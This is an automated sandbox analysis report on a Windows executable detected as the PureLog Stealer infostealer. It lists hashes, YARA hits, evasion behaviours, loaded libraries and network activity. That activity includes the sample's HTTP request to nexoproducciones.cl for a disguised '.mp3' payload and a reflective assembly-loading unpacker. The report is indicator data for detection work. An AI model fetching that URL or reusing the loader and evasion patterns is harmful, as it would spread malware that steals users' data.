Edit tour

Windows Analysis Report
q86onx3LvU.exe

Overview

General Information

Sample name:	q86onx3LvU.exe renamed because original name is a hash value
Original sample name:	74ef4e409c39d19ad4ed3bacde598f0b92c999de77961354300033f5a917b938.exe
Analysis ID:	1467002
MD5:	3aa2339d295c90c1a0fbfad98e9cebd0
SHA1:	518a9c5b94df0ad8933b46c2ef3a0ad88fa01a77
SHA256:	74ef4e409c39d19ad4ed3bacde598f0b92c999de77961354300033f5a917b938
Tags:	exe
Infos:

Detection

PureLog Stealer

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected PureLog Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Machine Learning detection for sample

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Classification

Process Tree

System is w10x64

q86onx3LvU.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\q86onx3LvU.exe" MD5: 3AA2339D295C90C1A0FBFAD98E9CEBD0)

WerFault.exe (PID: 4388 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 2400 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1449645106.0000000004F80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1449645106.0000000004D54000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: q86onx3LvU.exe PID: 6740	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.q86onx3LvU.exe.4d54c18.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.q86onx3LvU.exe.4f80a40.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.q86onx3LvU.exe.4d54c18.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.q86onx3LvU.exe.4f80a40.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: q86onx3LvU.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: q86onx3LvU.exe

Joe Sandbox ML: detected

Source: q86onx3LvU.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.11:49704 version: TLS 1.2

Source: q86onx3LvU.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb= source: q86onx3LvU.exe, 00000000.00000002.1447594980.000000000137B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: C:\Users\user\Desktop\q86onx3LvU.PDB source: q86onx3LvU.exe, 00000000.00000002.1447361864.0000000001138000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx source: q86onx3LvU.exe, 00000000.00000002.1454840665.0000000006A10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447361864.0000000001138000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb8S source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447594980.000000000137B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdbL0 source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb$ source: q86onx3LvU.exe, 00000000.00000002.1454840665.0000000006A10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: %%.pdb source: q86onx3LvU.exe, 00000000.00000002.1447361864.0000000001138000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbp source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb& source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.pdb4 source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\Desktop\q86onx3LvU.PDB source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb6 source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr

Source: global traffic

HTTP traffic detected: GET /Fgaxcapme.mp3 HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Fgaxcapme.mp3 HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: nexoproducciones.cl

Source: q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nexoproducciones.cl
Source: q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nexoproducciones.cld
Source: q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, q86onx3LvU.exe, 00000000.00000002.1449216214.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: q86onx3LvU.exe, 00000000.00000002.1449216214.0000000003271000.00000004.00000800.00020000.00000000.sdmp, q86onx3LvU.exe, 00000000.00000002.1449216214.00000000032E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nexoproducciones.cl
Source: q86onx3LvU.exe, 00000000.00000002.1449216214.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nexoproducciones.cl/Fgaxcapme.mp3
Source: q86onx3LvU.exe	String found in binary or memory: https://nexoproducciones.cl/Fgaxcapme.mp3#EnableInitializer1jd5Ef2ZS9fTVqPfeqDQhpg==

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.11:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 2400

Source: q86onx3LvU.exe, 00000000.00000000.1260384261.0000000000DA4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePsafpozw.exe2 vs q86onx3LvU.exe
Source: q86onx3LvU.exe, 00000000.00000002.1447594980.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs q86onx3LvU.exe
Source: q86onx3LvU.exe	Binary or memory string: OriginalFilenamePsafpozw.exe2 vs q86onx3LvU.exe

Source: q86onx3LvU.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal72.troj.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6740

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\8f02e3a3-3847-4ea6-b816-26ca4f2d5e87

Jump to behavior

Source: q86onx3LvU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: q86onx3LvU.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: q86onx3LvU.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\q86onx3LvU.exe

File read: C:\Users\user\Desktop\q86onx3LvU.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\q86onx3LvU.exe "C:\Users\user\Desktop\q86onx3LvU.exe"
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 2400

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: q86onx3LvU.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: q86onx3LvU.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb= source: q86onx3LvU.exe, 00000000.00000002.1447594980.000000000137B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: C:\Users\user\Desktop\q86onx3LvU.PDB source: q86onx3LvU.exe, 00000000.00000002.1447361864.0000000001138000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx source: q86onx3LvU.exe, 00000000.00000002.1454840665.0000000006A10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447361864.0000000001138000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb8S source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: q86onx3LvU.exe, 00000000.00000002.1447594980.000000000137B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdbL0 source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb$ source: q86onx3LvU.exe, 00000000.00000002.1454840665.0000000006A10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: %%.pdb source: q86onx3LvU.exe, 00000000.00000002.1447361864.0000000001138000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbp source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb& source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.pdb4 source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\Desktop\q86onx3LvU.PDB source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb6 source: q86onx3LvU.exe, 00000000.00000002.1447594980.0000000001384000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER5D67.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5D67.tmp.dmp.10.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: q86onx3LvU.exe, -.cs

.Net Code: _0001 System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match

File source: Process Memory Space: q86onx3LvU.exe PID: 6740, type: MEMORYSTR

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\q86onx3LvU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
